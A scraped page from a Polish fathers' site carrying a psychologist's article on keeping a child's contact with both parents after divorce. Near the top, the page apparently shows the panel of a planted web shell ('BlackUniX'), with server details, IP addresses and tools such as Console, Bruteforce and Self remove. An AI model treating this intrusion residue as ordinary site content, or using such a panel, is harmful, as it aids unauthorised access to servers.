W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 07:21:23
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.153.90
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Co z dzieckiem po rozwodzie?
15.05.2010.
Joanna Zwierzchowska, psycholog Fundacji AKCJA realizującej kampanię społeczną „Nawet po rozwodzie jesteście mi potrzebni oboje” - musisz zrobić wszystko, by po rozwodzie dziecko miało stały kontakt zarówno z Tobą, jak i z ojcem. Rozwód to trudny okres nie tylko dla Ciebie i Twojego małżonka. Jedną z najbardziej przeżywających rozstanie osób jest  wasze dziecko. Dlatego nie należy udawać przed maluchem, że wszystko jest w porządku. Dzieci widzą, iż w domu dzieje się coś niedobrego, jednak póki z nim nie porozmawiasz będzie czuło się zagubione w nowej sytuacji.

Porozmawiajcie z dzieckiem. Zachęć więc swojego małżonka do tego, abyście razem usiedli z dzieckiem, opowiedzieli o swojej decyzji oraz o tym jak będzie wyglądało dalsze jego życie i kontakty z rodzicami. Bardzo ważne jest byście pokazali dziecku, że w dalszym ciągu bardzo mocno je kochacie i że będziecie się nim wspólnie opiekować, tylko na trochę innych zasadach.  Dziecko powinno wiedzieć, ze nie traci któregoś z rodziców, ani jego miłości. Musi być pewne, że będzie mogło nadal wspólnie spędzać czas z rodzicem. Jeżeli maluch lubi chodzić z Tobą na basen to musi mieć świadomość, że to się nie zmieni. Podobnie rzecz wygląda w wypadku weekendowych wypadów na narty z tatą.
Nie rozwodzisz się z dzieckiem
Pod żadnym pozorem nie daj się ponieść negatywnym emocjom i nie staraj się przekonać dziecka, do tego, że winę za rozpad rodziny ponosi tylko i wyłącznie ojciec. Postawienie dziecka przed koniecznością wyboru któreś z racji to dla niego ogromnie stresujące zadanie, któremu może nie sprostać. Pamiętaj, że ty może nie kochasz już swojego męża, ale dziecko zawsze będzie widziało w nim umiłowanego ojca. Oczernianie drugiej strony nic pomoże, a może wręcz zaszkodzić psychice malucha.
Ważny kontakt
Najważniejsze, by mimo konfliktu między matką a ojcem, słowo dane dziecku zostało dotrzymane. Należy więc robić wszystko, by żadna ze stron po rozwodzie nie miała ograniczonego kontaktu z maluchem. Dziecko ma prawo do miłości obydwojga rodziców i okazywania im swoich uczuć.  Stałe relacje zarówno z mamą i tatą, ważne są też z racji rozwoju młodego człowieka. Przykładowo najmłodsi pomiędzy trzecim a szóstym rokiem życia tworzą podstawę swojej tożsamość. Wtedy zaczynają kształtują orientację seksualną i wizję kontaktów kobieta – mężczyzna. W tym kontekście utrzymanie, czy nawet polepszenie, relacji między rodzicami, jest kluczowe dla jego rozwoju. Nie bez znaczenia jest także fakt, że dzieci cieszące się po rozwodzie zainteresowaniem obojga rodziców czują się mniej samotne. Zdecydowanie bardziej są zadowoleni  z życia i chętniej korzystają ze wsparcia rówieśników, niż dzieci, których kontakt z jednym z rodziców jest słaby.
Plan na przyszłość
Dobrze jest ustalić zakres opieki nad dzieckiem, tak by miało ono stały kontakt z obydwoma stronami. Daje to mu możliwość przywrócenia stabilności i zachwianego  rozwodem poczucia bezpieczeństwa. Obecnie  prawo zachęca  do takiego działania poprzez przyznanie opieki nad dzieckiem obojgu rodzicom, jeśli stworzą oni  tzw. wspólny plan opieki wychowawczej. Wtedy rodzice sami decydują, kto będzie odbierał malucha ze szkoły, kto będzie z nim jeździł na wakacje, czy gdzie dziecko zamieszka. To duże lepsze rozwiązanie, dla wszystkich, niż zdanie się na decyzję sądu, który tak dobrze jak Wy nie zna relacji w rodzinie.
Czasem bywa, że konflikt w rodzinie jest tak dalece posunięty, że rodzice za nic w świecie nie potrafią się dogadać w sprawie przyszłości dziecka. Jeżeli tak samo jest w Twoim wypadku, to razem z mężem skorzystajcie z pomocy profesjonalnego mediatora. Pomoże on stworzyć wspomniany plan opieki, będzie moderował waszą dyskusje i będzie starał się wam podsuwać możliwe rozwiązania. Pamiętajcie, że tworzycie plan nie dla siebie, a dla dziecka – tu miejsca na próżność i dumę. Potrzebny jest kompromis, który pozwoli dziecku na prawidłowy rozwój.
Więcej informacji na stronie: www.rodzina.sos.pl

Highlite PR

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
20.06.2018.